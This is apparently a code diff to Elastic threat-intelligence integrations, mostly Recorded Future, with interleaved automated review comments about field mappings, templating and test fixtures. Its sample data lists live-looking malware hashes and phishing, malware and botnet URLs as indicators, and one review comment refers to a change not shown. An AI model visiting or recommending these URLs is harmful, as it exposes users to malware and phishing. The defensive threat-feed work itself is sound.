title: Rapid7 Threat Command # The version must be updated manually in the transform.yml files and transform APIs mentioned in README. -version: "1.14.1" +version: "1.15.0" description: Collect threat intelligence from Threat Command API with Elastic Agent. type: integration categories: ["security", "threat_intel"] conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 elastic: capabilities: - security 
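Review bot: The `keyword` mapping here only takes effect when the `latest_ioc` transform's destination index is (re)created; an existing destination index keeps `otx.id` mapped as `long`, and with Elasticsearch's default numeric coercion the transform would keep writing the now-string ids into it without failing, so the inconsistency this change fixes would quietly persist there. `transform.yml` is not in this diff, so confirm it bumps the transform version or destination index name so that a fresh index is created on upgrade, as the comment in the rapid7 manifest (`The version must be updated manually in the transform.yml files`) describes for that package.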
@@ -96,6 +96,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: proxy_url type: text title: Proxy URL diff --git a/packages/ti_recordedfuture/_dev/deploy/docker/sample_logs/rf_file_default.csv b/packages/ti_recordedfuture/_dev/deploy/docker/sample_logs/rf_file_default.csv new file mode 100644 index 00000000000..9af0c24dcb0 --- /dev/null +++ b/packages/ti_recordedfuture/_dev/deploy/docker/sample_logs/rf_file_default.csv 
@@ -0,0 +1,3 @@ +"Name","Algorithm","Risk","RiskString","EvidenceDetails" +"63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f","SHA-256","75","2/17","{""EvidenceDetails"": [{""Name"": ""linkedToMalware"", ""EvidenceString"": ""2 sightings on 1 source: PolySwarm. Most recent link (Mar 23, 2024): https://polyswarm.network/scan/results/file/63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f"", ""CriticalityLabel"": ""Suspicious"", ""MitigationString"": """", ""Rule"": ""Linked to Malware"", ""SourcesCount"": 1.0, ""Sources"": [""source:doLlw5""], ""Timestamp"": ""2024-03-23T17:10:20.642Z"", ""SightingsCount"": 2.0, ""Criticality"": 2.0}, {""Name"": ""positiveMalwareVerdict"", ""EvidenceString"": ""3 sightings on 3 sources: Polyswarm Sandbox Analysis, Recorded Future Triage Malware Analysis, PolySwarm. Most recent link (Mar 23, 2024): https://polyswarm.network/scan/results/file/63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f"", ""CriticalityLabel"": ""Malicious"", ""MitigationString"": """", ""Rule"": ""Positive Malware Verdict"", ""SourcesCount"": 3.0, ""Sources"": [""source:hzRhwZ"", ""source:ndy5_2"", ""source:doLlw5""], ""Timestamp"": ""2024-03-23T16:36:02.000Z"", ""SightingsCount"": 3.0, ""Criticality"": 3.0}]}" +"ea0e23a30aa252e4c8a7a8cb92ac2bba1ffcb4e94027bca555798b2920f9bfab","SHA-256","75","2/17","{""EvidenceDetails"": [{""Name"": ""linkedToMalware"", ""EvidenceString"": ""10 sightings on 1 source: PolySwarm. 
Most recent link (Mar 24, 2024): https://polyswarm.network/scan/results/file/ea0e23a30aa252e4c8a7a8cb92ac2bba1ffcb4e94027bca555798b2920f9bfab"", ""CriticalityLabel"": ""Suspicious"", ""MitigationString"": """", ""Rule"": ""Linked to Malware"", ""SourcesCount"": 1.0, ""Sources"": [""source:doLlw5""], ""Timestamp"": ""2024-03-24T21:22:00.282Z"", ""SightingsCount"": 10.0, ""Criticality"": 2.0}, {""Name"": ""positiveMalwareVerdict"", ""EvidenceString"": ""31 sightings on 3 sources: Recorded Future Sandbox, Polyswarm Sandbox Analysis, PolySwarm. Malware sandbox report for ea0e23a30aa252e4c8a7a8cb92ac2bba1ffcb4e94027bca555798b2920f9bfab on March 27, 2024. Score: 10 (Known bad). Detections: njRAT. Contains: 6 ATT\\u0026CK behaviors, 1 command and control indicator, and 12 signatures. Most recent link (Mar 24, 2024): https://polyswarm.network/scan/results/file/ea0e23a30aa252e4c8a7a8cb92ac2bba1ffcb4e94027bca555798b2920f9bfab"", ""CriticalityLabel"": ""Malicious"", ""MitigationString"": """", ""Rule"": ""Positive Malware Verdict"", ""SourcesCount"": 3.0, ""Sources"": [""source:oWAWVb"", ""source:hzRhwZ"", ""source:doLlw5""], ""Timestamp"": ""2024-03-24T20:33:10.000Z"", ""SightingsCount"": 31.0, ""Criticality"": 3.0}]}" diff --git a/packages/ti_recordedfuture/_dev/deploy/docker/sample_logs/rf_url_default.csv b/packages/ti_recordedfuture/_dev/deploy/docker/sample_logs/rf_url_default.csv index 1327a0d94f1..19e58d712e6 100644 --- a/packages/ti_recordedfuture/_dev/deploy/docker/sample_logs/rf_url_default.csv +++ b/packages/ti_recordedfuture/_dev/deploy/docker/sample_logs/rf_url_default.csv 
@@ -8,3 +8,4 @@
 "https://www.jeanninecatddns.chickenkiller.com/signin-authflow","75","3/24","{""EvidenceDetails"": [{""Rule"": ""Recently Active URL on Weaponized Domain"", ""CriticalityLabel"": ""Malicious"", ""EvidenceString"": ""1 sighting on 1 source: Recorded Future Domain Analysis URLs. Service provider: Afraid.org. Behavior observed: Malware Distribution, Phishing Techniques. Last observed on Dec 28, 2021."", ""Sources"": [""report:aRJ1CU""], ""Timestamp"": ""2021-12-28T22:15:49.631Z"", ""Name"": ""recentWeaponizedURL"", ""MitigationString"": """", ""Criticality"": 3.0}, {""Rule"": ""Recently Detected Phishing Techniques"", ""CriticalityLabel"": ""Malicious"", ""EvidenceString"": ""2 sightings on 2 sources: Bitdefender, Urlscan.io. Detected malicious behavior from an endpoint agent via global telemetry. Last observed on Dec 28, 2021."", ""Sources"": [""d3Awkm"", ""eKv4Jm""], ""Timestamp"": ""2021-12-28T00:00:00.000Z"", ""Name"": ""recentPhishingSiteDetected"", ""MitigationString"": """", ""Criticality"": 3.0}, {""Rule"": ""Recently Detected Malware Distribution"", ""CriticalityLabel"": ""Malicious"", ""EvidenceString"": ""1 sighting on 1 source: Bitdefender. Detected malicious behavior from an endpoint agent via global telemetry. Last observed on Dec 28, 2021."", ""Sources"": [""d3Awkm""], ""Timestamp"": ""2021-12-28T00:00:00.000Z"", ""Name"": ""recentMalwareSiteDetected"", ""MitigationString"": """", ""Criticality"": 3.0}]}"
 "http://coollab.jp/dir/root/p/09908.js","75","3/24","{""EvidenceDetails"": [{""Rule"": ""Historically Reported as a Defanged URL"", ""CriticalityLabel"": ""Unusual"", ""EvidenceString"": ""24 sightings on 9 sources including: Malware News - Malware Analysis, News and Indicators, microsoft.com, sociabble.com, 4-traders.com, MarketScreener.com | Stock Market News. 
Most recent link (Aug 13, 2021): https://www.marketscreener.com/quote/stock/MICROSOFT-CORPORATION-4835/news/Microsoft-Attackers-use-Morse-code-other-encryption-methods-in-evasive-phishing-campaign-36161110/?utm_medium=RSS&utm_content=20210813"", ""Sources"": [""gBDK5G"", ""idn:microsoft.com"", ""idn:sociabble.com"", ""KBTQ2e"", ""dCotni"", ""g9rk5F"", ""Z7kln5"", ""idn:cda.ms"", ""idn:thewindowsupdate.com""], ""Timestamp"": ""2021-08-13T17:03:19.000Z"", ""Name"": ""defangedURL"", ""MitigationString"": """", ""Criticality"": 1.0}, {""Rule"": ""Historically Detected Malware Distribution"", ""CriticalityLabel"": ""Unusual"", ""EvidenceString"": ""1 sighting on 1 source: Bitdefender. Detected malicious behavior from an endpoint agent via global telemetry. Last observed on Aug 13, 2021."", ""Sources"": [""d3Awkm""], ""Timestamp"": ""2021-08-13T00:00:00.000Z"", ""Name"": ""malwareSiteDetected"", ""MitigationString"": """", ""Criticality"": 1.0}, {""Rule"": ""Recently Reported by Insikt Group"", ""CriticalityLabel"": ""Malicious"", ""EvidenceString"": ""1 sighting on 1 source: Insikt Group. 1 report: Microsoft Warns of Attacks Targeting Microsoft Office 365 Users. Most recent link (Aug 12, 2021): https://app.recordedfuture.com/live/sc/4BBhpn1ApBQR"", ""Sources"": [""VKz42X""], ""Timestamp"": ""2021-08-12T00:00:00.000Z"", ""Name"": ""recentAnalystNote"", ""MitigationString"": """", ""Criticality"": 3.0}]}"
 "https://blog.br0vvnn.io","75","3/24","{""EvidenceDetails"": [{""Rule"": ""Historically Reported as a Defanged URL"", ""CriticalityLabel"": ""Unusual"", ""EvidenceString"": ""23 sightings on 9 sources including: The Official Google Blog, eccouncil.org, frsecure.com, SoyaCincau, PasteBin. Most recent tweet: Actor controlled sites and accounts Research Blog https://blog.br0vvnn[.]io. 
Most recent link (Jan 27, 2021): https://twitter.com/techn0m4nc3r/statuses/1354296736357953539"", ""Sources"": [""Gzt"", ""idn:eccouncil.org"", ""idn:frsecure.com"", ""J-8-Nr"", ""Jv_xrR"", ""g9rk5F"", ""cUg0pv"", ""K5LKj8"", ""fVAueu""], ""Timestamp"": ""2021-01-27T05:14:38.000Z"", ""Name"": ""defangedURL"", ""MitigationString"": """", ""Criticality"": 1.0}, {""Rule"": ""Historically Detected Phishing Techniques"", ""CriticalityLabel"": ""Unusual"", ""EvidenceString"": ""1 sighting on 1 source: Bitdefender. Detected malicious behavior from an endpoint agent via global telemetry. Last observed on May 30, 2021."", ""Sources"": [""d3Awkm""], ""Timestamp"": ""2021-05-30T00:00:00.000Z"", ""Name"": ""phishingSiteDetected"", ""MitigationString"": """", ""Criticality"": 1.0}, {""Rule"": ""Recently Reported by Insikt Group"", ""CriticalityLabel"": ""Malicious"", ""EvidenceString"": ""1 sighting on 1 source: Insikt Group. 1 report: Google Warns of Ongoing Attacks Targeting Security Researchers. Most recent link (Jan 25, 2021): https://app.recordedfuture.com/live/sc/5QCqZ2ZH4lwc"", ""Sources"": [""VKz42X""], ""Timestamp"": ""2021-01-25T00:00:00.000Z"", ""Name"": ""recentAnalystNote"", ""MitigationString"": """", ""Criticality"": 3.0}]}"
+"http://cleaning.homesecuritypc.com/packages/fduphhq_bzaeudor.bmp","66","3/35","{""EvidenceDetails"":""{""EvidenceDetails"": [{""Name"": ""malwareSiteDetected"", ""EvidenceString"": ""9 sightings on 1 source: External Sensor Data Analysis. 
http://cleaning.homesecuritypc.com/packages/fduphhq_bzaeudor.bmp is observed to be a malware site URL that navigates to malicious content including executables, drive-by infection sites, malicious scripts, viruses, trojans, or code."", ""CriticalityLabel"": ""Unusual"", ""MitigationString"": """", ""Rule"": ""Historically Detected Malware Distribution"", ""SourcesCount"": 1.0, ""Sources"": [""source:kBB1fk""], ""Timestamp"": ""2022-07-20T20:40:11.605Z"", ""SightingsCount"": 9.0, ""Criticality"": 1.0}, {""Name"": ""botnetUrl"", ""EvidenceString"": ""8 sightings on 1 source: External Sensor Data Analysis. http://cleaning.homesecuritypc.com/packages/fduphhq_bzaeudor.bmp is observed to be a botnet URL from which network attacks are launched. Attacks may include SPAM messages, DOS, SQL injections, proxy jacking, and other unsolicited contacts."", ""CriticalityLabel"": ""Unusual"", ""MitigationString"": """", ""Rule"": ""Historically Reported Botnet URL"", ""SourcesCount"": 1.0, ""Sources"": [""source:kBB1fk""], ""Timestamp"": ""2022-07-20T20:40:11.605Z"", ""SightingsCount"": 8.0, ""Criticality"": 1.0}, {""Name"": ""recentWeaponizedURL"", ""EvidenceString"": ""1 sighting on 1 source: Recorded Future Domain Analysis URLs. Service provider: No-IP. Behavior observed: Malware Distribution, Phishing Techniques. Last observed on Jan 12, 2024."", ""CriticalityLabel"": ""Malicious"", ""MitigationString"": """", ""Rule"": ""Recently Active URL on Weaponized Domain"", ""SourcesCount"": 1.0, ""Sources"": [""report:aRJ1CU""], ""Timestamp"": ""2024-03-28T11:46:43.868Z"", ""SightingsCount"": 1.0, ""Criticality"": 3.0}]}"
diff --git a/packages/ti_recordedfuture/changelog.yml b/packages/ti_recordedfuture/changelog.yml
index 1729c3e8ac2..6c914987ff9 100644
--- a/packages/ti_recordedfuture/changelog.yml
+++ b/packages/ti_recordedfuture/changelog.yml
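Review bot: The EvidenceDetails cell of the added `cleaning.homesecuritypc.com` row is not valid JSON: once the CSV quote doubling is undone it reads `{"EvidenceDetails":"{"EvidenceDetails": [...]}`, so the inner object sits inside an unterminated string and the outer brace is never closed, unlike the `{""EvidenceDetails"": [...]}` shape of the three context rows above it. If the row is meant to exercise the pipeline's failure handling for a malformed feed line, that intent should be recorded (in the PR description or next to the system test config), since a hit-count assertion presumably accepts the document whether or not the field parsed. If it is a paste error, the cell should start with `"{""EvidenceDetails"": [{""Name"": ""malwareSiteDetected""` and end with `}]}"`, matching the other rows.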
@@ -1,4 +1,19 @@
 # newer versions go on top
+- version: "1.23.0"
+ changes:
+ - description: Add dashboards and list field
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9471
+- version: "1.22.0"
+ changes:
+ - description: Set sensitive values as secret.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9129
+- version: "1.21.0"
+ changes:
+ - description: Make `threat.indicator.url.full` available for rule detections.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9052
 - version: "1.20.2"
 changes:
 - description: Changed owners
diff --git a/packages/ti_recordedfuture/data_stream/threat/_dev/test/pipeline/test-httpjson.log-expected.json b/packages/ti_recordedfuture/data_stream/threat/_dev/test/pipeline/test-httpjson.log-expected.json
index 9b1626ad65d..96741d5149f 100644
--- a/packages/ti_recordedfuture/data_stream/threat/_dev/test/pipeline/test-httpjson.log-expected.json
+++ b/packages/ti_recordedfuture/data_stream/threat/_dev/test/pipeline/test-httpjson.log-expected.json
@@ -4289,6 +4289,7 @@
 "type": "url",
 "url": {
 "domain": "144.34.179.162",
+ "full": "http://144.34.179.162/a",
 "original": "http://144.34.179.162/a",
 "path": "/a",
 "scheme": "http"
@@ -4404,6 +4405,7 @@
 "type": "url",
 "url": {
 "domain": "adminsys.serveftp.com",
+ "full": "http://adminsys.serveftp.com/nensa/fabio/ex/478632215/zer7855/nuns566623",
 "original": "http://adminsys.serveftp.com/nensa/fabio/ex/478632215/zer7855/nuns566623",
 "path": "/nensa/fabio/ex/478632215/zer7855/nuns566623",
 "scheme": "http"
@@ -4490,6 +4492,7 @@
 "url": {
 "domain": "3.145.115.94",
 "extension": "exe",
+ "full": "http://3.145.115.94/zambo/groenhuyzen.exe",
 "original": "http://3.145.115.94/zambo/groenhuyzen.exe",
 "path": "/zambo/groenhuyzen.exe",
 "scheme": "http"
@@ -4575,6 +4578,7 @@
 "type": "url",
 "url": {
 "domain": "gxbrowser.net",
+ "full": "http://gxbrowser.net",
 "original": "http://gxbrowser.net",
 "path": "",
 "scheme": "http"
@@ -4672,6 +4676,7 @@
 "url": {
 "domain": "881.000webhostapp.com",
 "extension": "txt",
+ "full": "https://881.000webhostapp.com/1.txt",
 "original": "https://881.000webhostapp.com/1.txt",
 "path": "/1.txt",
 "scheme": "https"
@@ -4777,6 +4782,7 @@
 "url": {
 "domain": "comunicador.duckdns.org",
 "extension": "php",
+ "full": "http://comunicador.duckdns.org/catalista/lixo/index.php",
 "original": "http://comunicador.duckdns.org/catalista/lixo/index.php",
 "path": "/catalista/lixo/index.php",
 "scheme": "http"
@@ -4859,6 +4865,7 @@
 "type": "url",
 "url": {
 "domain": "www.jeanninecatddns.chickenkiller.com",
+ "full": "https://www.jeanninecatddns.chickenkiller.com/signin-authflow",
 "original": "https://www.jeanninecatddns.chickenkiller.com/signin-authflow",
 "path": "/signin-authflow",
 "scheme": "https"
@@ -4954,6 +4961,7 @@
 "url": {
 "domain": "coollab.jp",
 "extension": "js",
+ "full": "http://coollab.jp/dir/root/p/09908.js",
 "original": "http://coollab.jp/dir/root/p/09908.js",
 "path": "/dir/root/p/09908.js",
 "scheme": "http"
@@ -5047,6 +5055,7 @@
 "type": "url",
 "url": {
 "domain": "blog.br0vvnn.io",
+ "full": "https://blog.br0vvnn.io",
 "original": "https://blog.br0vvnn.io",
 "path": "",
 "scheme": "https"
@@ -5128,6 +5137,7 @@
 "type": "url",
 "url": {
 "domain": "init.icloud-analysis.com",
+ "full": "http://init.icloud-analysis.com",
 "original": "http://init.icloud-analysis.com",
 "path": "",
 "scheme": "http"
@@ -5201,6 +5211,7 @@
 "type": "url",
 "url": {
 "domain": "init.icloud-analysis.com",
+ "full": "http://init.icloud-analysis.com",
 "original": "http://init.icloud-analysis.com",
 "path": "",
 "scheme": "http"
diff --git a/packages/ti_recordedfuture/data_stream/threat/_dev/test/pipeline/test-url-default.log-expected.json b/packages/ti_recordedfuture/data_stream/threat/_dev/test/pipeline/test-url-default.log-expected.json
index 51a9e19b469..1e1b422745b 100644
--- a/packages/ti_recordedfuture/data_stream/threat/_dev/test/pipeline/test-url-default.log-expected.json
+++ b/packages/ti_recordedfuture/data_stream/threat/_dev/test/pipeline/test-url-default.log-expected.json
@@ -87,6 +87,7 @@
 "type": "url",
 "url": {
 "domain": "144.34.179.162",
+ "full": "http://144.34.179.162/a",
 "original": "http://144.34.179.162/a",
 "path": "/a",
 "scheme": "http"
@@ -202,6 +203,7 @@
 "type": "url",
 "url": {
 "domain": "adminsys.serveftp.com",
+ "full": "http://adminsys.serveftp.com/nensa/fabio/ex/478632215/zer7855/nuns566623",
 "original": "http://adminsys.serveftp.com/nensa/fabio/ex/478632215/zer7855/nuns566623",
 "path": "/nensa/fabio/ex/478632215/zer7855/nuns566623",
 "scheme": "http"
@@ -288,6 +290,7 @@
 "url": {
 "domain": "3.145.115.94",
 "extension": "exe",
+ "full": "http://3.145.115.94/zambo/groenhuyzen.exe",
 "original": "http://3.145.115.94/zambo/groenhuyzen.exe",
 "path": "/zambo/groenhuyzen.exe",
 "scheme": "http"
@@ -373,6 +376,7 @@
 "type": "url",
 "url": {
 "domain": "gxbrowser.net",
+ "full": "http://gxbrowser.net",
 "original": "http://gxbrowser.net",
 "path": "",
 "scheme": "http"
@@ -470,6 +474,7 @@
 "url": {
 "domain": "881.000webhostapp.com",
 "extension": "txt",
+ "full": "https://881.000webhostapp.com/1.txt",
 "original": "https://881.000webhostapp.com/1.txt",
 "path": "/1.txt",
 "scheme": "https"
@@ -575,6 +580,7 @@
 "url": {
 "domain": "comunicador.duckdns.org",
 "extension": "php",
+ "full": "http://comunicador.duckdns.org/catalista/lixo/index.php",
 "original": "http://comunicador.duckdns.org/catalista/lixo/index.php",
 "path": "/catalista/lixo/index.php",
 "scheme": "http"
@@ -657,6 +663,7 @@
 "type": "url",
 "url": {
 "domain": "www.jeanninecatddns.chickenkiller.com",
+ "full": "https://www.jeanninecatddns.chickenkiller.com/signin-authflow",
 "original": "https://www.jeanninecatddns.chickenkiller.com/signin-authflow",
 "path": "/signin-authflow",
 "scheme": "https"
@@ -752,6 +759,7 @@
 "url": {
 "domain": "coollab.jp",
 "extension": "js",
+ "full": "http://coollab.jp/dir/root/p/09908.js",
 "original": "http://coollab.jp/dir/root/p/09908.js",
 "path": "/dir/root/p/09908.js",
 "scheme": "http"
@@ -845,6 +853,7 @@
 "type": "url",
 "url": {
 "domain": "blog.br0vvnn.io",
+ "full": "https://blog.br0vvnn.io",
 "original": "https://blog.br0vvnn.io",
 "path": "",
 "scheme": "https"
@@ -937,6 +946,7 @@
 ],
 "type": "url",
 "url": {
+ "full": "example.net/%e3%83%9d%e3%82%b1%e3%83%a2%e3%83%b3-%e3%82%bb%e3%83%b3%e3%82%bf%e3%83%bc-%e6%a8%aa%e6%b5%9c-%e7%a7%bb%e8%bb%a2-%e3%81%aa%e3%81%9c/%e3%81%b5%e3%82%8b%e3%81%95%e3%81%a8-%e7%b4%8d%e7%a8%8e-%e3%83%88%e3%82%a4%e3%83%ac%e3%83%83%e3%83%88-%e3%83%9a%e3%83%bc%e3%83%91%e3%83%bc-%e9%82%84%e5%85%83-%e7%8e%87/%e6%9c%9d%e6%97%a5-%e6%96%b0%e8%81%9e-be-%e3%83%91%e3%82%ba%e3%83%a",
 "original": "example.net/%e3%83%9d%e3%82%b1%e3%83%a2%e3%83%b3-%e3%82%bb%e3%83%b3%e3%82%bf%e3%83%bc-%e6%a8%aa%e6%b5%9c-%e7%a7%bb%e8%bb%a2-%e3%81%aa%e3%81%9c/%e3%81%b5%e3%82%8b%e3%81%95%e3%81%a8-%e7%b4%8d%e7%a8%8e-%e3%83%88%e3%82%a4%e3%83%ac%e3%83%83%e3%83%88-%e3%83%9a%e3%83%bc%e3%83%91%e3%83%bc-%e9%82%84%e5%85%83-%e7%8e%87/%e6%9c%9d%e6%97%a5-%e6%96%b0%e8%81%9e-be-%e3%83%91%e3%82%ba%e3%83%a"
 }
 }
diff --git a/packages/ti_recordedfuture/data_stream/threat/_dev/test/system/test-csv-file-config.yml b/packages/ti_recordedfuture/data_stream/threat/_dev/test/system/test-csv-file-config.yml
index 55abeba415d..3e6146da9b9 100644
--- a/packages/ti_recordedfuture/data_stream/threat/_dev/test/system/test-csv-file-config.yml
+++ b/packages/ti_recordedfuture/data_stream/threat/_dev/test/system/test-csv-file-config.yml
@@ -4,3 +4,5 @@ data_stream:
 vars:
 paths:
 - "{{SERVICE_LOGS_DIR}}/*.csv"
+assert:
+ hit_count: 12
diff --git a/packages/ti_recordedfuture/data_stream/threat/_dev/test/system/test-fusion-file-download-config.yml b/packages/ti_recordedfuture/data_stream/threat/_dev/test/system/test-fusion-file-download-config.yml
index f9475f2867c..f6ec2610495 100644
--- a/packages/ti_recordedfuture/data_stream/threat/_dev/test/system/test-fusion-file-download-config.yml
+++ b/packages/ti_recordedfuture/data_stream/threat/_dev/test/system/test-fusion-file-download-config.yml
@@ -5,6 +5,7 @@ data_stream:
 vars:
 interval: 1m
 api_token: test-token
+ list: test
 custom_url: http://{{Hostname}}:{{Port}}/v2/fusion/files/?path=%2Fpublic%2Ftest-ip.csv
 preserve_original_event: true
 enable_request_tracer: true
diff --git a/packages/ti_recordedfuture/data_stream/threat/agent/stream/httpjson.yml.hbs b/packages/ti_recordedfuture/data_stream/threat/agent/stream/httpjson.yml.hbs
index e299d0eea5f..6f6ad2f49a1 100644
--- a/packages/ti_recordedfuture/data_stream/threat/agent/stream/httpjson.yml.hbs
+++ b/packages/ti_recordedfuture/data_stream/threat/agent/stream/httpjson.yml.hbs
@@ -24,11 +24,15 @@ request.transforms:
 value: {{ api_token }}
 {{/if}}
 response.decode_as: text/csv
+fields_under_root: true
+fields:
+ _conf:
+ list: '{{list}}'
 tags:
 {{#if preserve_original_event}}
 - preserve_original_event
 {{/if}}
-{{#each tags as |tag i|}}
+{{#each tags as |tag|}}
 - {{tag}}
 {{/each}}
 {{#contains "forwarded" tags}}
diff --git a/packages/ti_recordedfuture/data_stream/threat/elasticsearch/ingest_pipeline/default.yml b/packages/ti_recordedfuture/data_stream/threat/elasticsearch/ingest_pipeline/default.yml
index 7273a16e1c6..b9ac7cae402 100644
--- a/packages/ti_recordedfuture/data_stream/threat/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/ti_recordedfuture/data_stream/threat/elasticsearch/ingest_pipeline/default.yml
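Review bot: `list: '{{list}}'` places a user-configured value directly into a single-quoted YAML scalar, so a value containing `'` or a line break breaks the rendered input configuration, and the manifest definition of `list` that could constrain it is outside this diff. The variable's allowed characters should be restricted at the manifest level, or the value escaped before it is interpolated, rather than relying on the surrounding quotes. Separately, when `list` is unset the template still emits `list: ''`, and the pipeline's `ctx._conf?.list != null` guard does not filter an empty string, so the whole `fields_under_root`/`fields` block is better wrapped in `{{#if list}}` … `{{/if}}` so that `_conf.list` only exists when a risklist was actually configured.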
@@ -192,6 +192,10 @@ processors:
 - set:
 field: threat.indicator.url.original
 copy_from: json.Name
+ - set:
+ field: threat.indicator.url.full
+ copy_from: json.Name
+ if: 'ctx.threat?.indicator?.type == "url"'
 #
 # Domain indicators (threat.indicator.type=domain)
 #
@@ -233,6 +237,10 @@ processors:
 - rename:
 field: json
 target_field: recordedfuture
+ - rename:
+ target_field: recordedfuture.list
+ field: _conf.list
+ if: ctx._conf?.list != null
 #
 # Cleanup
 #
@@ -249,6 +257,7 @@ processors:
 - recordedfuture.Name
 - recordedfuture.Risk
 - _temp_
+ - _conf
 ignore_missing: true
 on_failure:
 - set:
diff --git a/packages/ti_recordedfuture/data_stream/threat/fields/fields.yml b/packages/ti_recordedfuture/data_stream/threat/fields/fields.yml
index d8c340d4c81..e64a4c67472 100644
--- a/packages/ti_recordedfuture/data_stream/threat/fields/fields.yml
+++ b/packages/ti_recordedfuture/data_stream/threat/fields/fields.yml
@@ -19,6 +19,11 @@ description: > Details of risk rules observed. + - name: list + type: keyword + description: > + User-configured risklist. + - name: labels.is_ioc_transform_source + type: constant_keyword + value: "true"
diff --git a/packages/ti_recordedfuture/data_stream/threat/manifest.yml b/packages/ti_recordedfuture/data_stream/threat/manifest.yml
index 118a0c24b43..6d513964a19 100644
--- a/packages/ti_recordedfuture/data_stream/threat/manifest.yml
+++ b/packages/ti_recordedfuture/data_stream/threat/manifest.yml
@@ -87,12 +87,13 @@ streams:
 required: true
 show_user: true
 - name: api_token
- type: text
+ type: password
 title: API Token
 description: Recorded Future API Token (RF_TOKEN).
 multi: false
 required: true
 show_user: true
+ secret: true
 - name: custom_url
 type: url
 title: Custom URL
diff --git a/packages/ti_recordedfuture/data_stream/threat/sample_event.json b/packages/ti_recordedfuture/data_stream/threat/sample_event.json
index c6847613155..22a46c78dec 100644
--- a/packages/ti_recordedfuture/data_stream/threat/sample_event.json
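Review bot: The new `set` for `threat.indicator.url.full` is gated on `ctx.threat?.indicator?.type == "url"`, while the `set` for `threat.indicator.url.original` directly above it copies the same `json.Name` with no condition visible in the hunk; if that processor is guarded by something above line 192 the new `if` is redundant, and if it is not, `url.original` and `url.full` will diverge for non-URL indicators. The two processors should carry the same guard, whichever it is. Since `copy_from: json.Name` makes `url.full` the raw list value rather than a normalised URL (the `example.net/%e3…` entry in the expected output has no scheme), a comment such as `# url.full is the raw list value, not normalised` next to the processor would make that explicit for rule authors.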
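Review bot: The `rename` of `_conf.list` lists `target_field` before `field`, the reverse of the `rename` directly above it; for consistency write `field: _conf.list` first, then `target_field: recordedfuture.list`. The `ctx._conf?.list != null` guard also admits an empty string, which is what the agent template's `list: '{{list}}'` renders when the variable is unset, so if `list` is optional `recordedfuture.list` ends up as `""` instead of being absent; `if: ctx._conf?.list != null && ctx._conf.list != ''` (or suppressing the field in the template) avoids indexing an empty keyword. The later `remove` of `_conf` with `ignore_missing: true` is fine either way.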
+++ b/packages/ti_recordedfuture/data_stream/threat/sample_event.json @@ -1,11 +1,11 @@ { - "@timestamp": "2023-08-29T13:05:30.615Z", + "@timestamp": "2024-03-29T13:00:04.736Z", "agent": { - "ephemeral_id": "4d3f7527-f999-48d2-920c-3ec5a0b34414", - "id": "5607d6f4-6e45-4c33-a087-2e07de5f0082", + "ephemeral_id": "fe05693b-59ec-47c6-9d5e-b0ef7c71ee65", + "id": "bc94f76a-cdb2-4211-9412-c5d6c5711711", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.1" + "version": "8.12.1" }, "data_stream": { "dataset": "ti_recordedfuture.threat", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "5607d6f4-6e45-4c33-a087-2e07de5f0082", + "id": "bc94f76a-cdb2-4211-9412-c5d6c5711711", "snapshot": false, - "version": "8.9.1" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", @@ -26,9 +26,9 @@ "threat" ], "dataset": "ti_recordedfuture.threat", - "ingested": "2023-08-29T13:05:31Z", + "ingested": "2024-03-29T13:00:14Z", "kind": "enrichment", - "risk_score": 87, + "risk_score": 75, "timezone": "+00:00", "type": [ "indicator" 
@@ -39,60 +39,45 @@ }, "log": { "file": { - "path": "/tmp/service_logs/rf_url_default.csv" + "path": "/tmp/service_logs/rf_file_default.csv" }, - "offset": 45 + "offset": 57 }, "recordedfuture": { "evidence_details": [ { - "Criticality": 1, - "CriticalityLabel": "Unusual", - "EvidenceString": "66 sightings on 22 sources including: Ars Technica, fook.news, urdupresss.com, HackDig Posts, apple.news. Most recent link (Jul 20, 2021): https://techsecuritenews.com/solarwinds-pirates-utilisent-nouvelle-faille-zero-day-attaques/", + "Criticality": 2, + "CriticalityLabel": "Suspicious", + "EvidenceString": "2 sightings on 1 source: PolySwarm. Most recent link (Mar 23, 2024): https://polyswarm.network/scan/results/file/63212aa8c94098a844945ed1611389b2e1c9dc3906a5ba9d7d0d320344213f4f", "MitigationString": "", - "Name": "defangedURL", - "Rule": "Historically Reported as a Defanged URL", + "Name": "linkedToMalware", + "Rule": "Linked to Malware", + "SightingsCount": 2, "Sources": [ - "Ctq", - "idn:fook.news", - "idn:urdupresss.com", - "POs2u-", - "idn:apple.news", - "idn:cryptoinfoos.com.ng", - "g9rk5F", - "idn:thewindowsupdate.com", - "idn:nationalcybersecuritynews.today", - "gBDK5G", - "idn:microsoft.com", - "idn:techsecuritenews.com", - "idn:mblogs.info", - "J6UzbO", - "idn:viralamo.com", - "idn:sellorbuyhomefast.com", - "idn:crazyboy.tech", - "idn:times24h.com", - "idn:buzzfeeg.com", - "idn:dsmenders.com", - "WroSbs", - "idn:vzonetvgh.com" + "source:doLlw5" ], - "Timestamp": "2021-07-20T00:00:00.000Z" + "SourcesCount": 1, + "Timestamp": "2024-03-23T17:10:20.642Z" }, { "Criticality": 3, "CriticalityLabel": "Malicious", - "EvidenceString": "1 sighting on 1 source: Insikt Group. 1 report: SolarWinds Fixes Critical Vulnerability in Serv-U Managed File Transfer and Secure FTP Products. 
